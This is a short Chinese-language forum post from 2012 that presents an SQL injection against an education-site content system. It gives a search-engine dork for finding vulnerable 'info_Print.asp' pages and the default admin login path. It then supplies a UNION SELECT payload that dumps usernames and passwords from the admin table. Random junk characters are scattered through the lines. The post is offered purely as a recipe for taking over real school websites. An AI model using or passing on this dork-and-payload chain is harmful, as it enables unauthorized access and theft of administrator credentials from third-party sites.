教育站打印页面漏洞# r& i: s6 b( q0 `
百度或google搜索 inurl:info_Print.asp?ArticleID=, u) L3 r0 q- H4 J9 |: H8 v
默认后台:/ad_login.asp5 ]) R4 {4 i( W7 G' y
爆管理员密码:! v6 {% L: [7 s! I, t& }" E
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可, I9 P+ N; M" a% V6 R( ^: o( ]& ^3 S1 J
5 L' \- i" F$ o) ~union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin! e$ V2 }. }$ Y1 s; E+ B& I0 G
% G8 j1 h |% [作者:佚名
2 ^; v- F; y/ p9 S+ S1 r+ m1 s! U% J
& d' c& k. n. f" F9 ]( j
* s" g) }& Y& }. Q" B! |- o2 R |
发表于 2012-10-31 08:37:31
收藏
支持
反对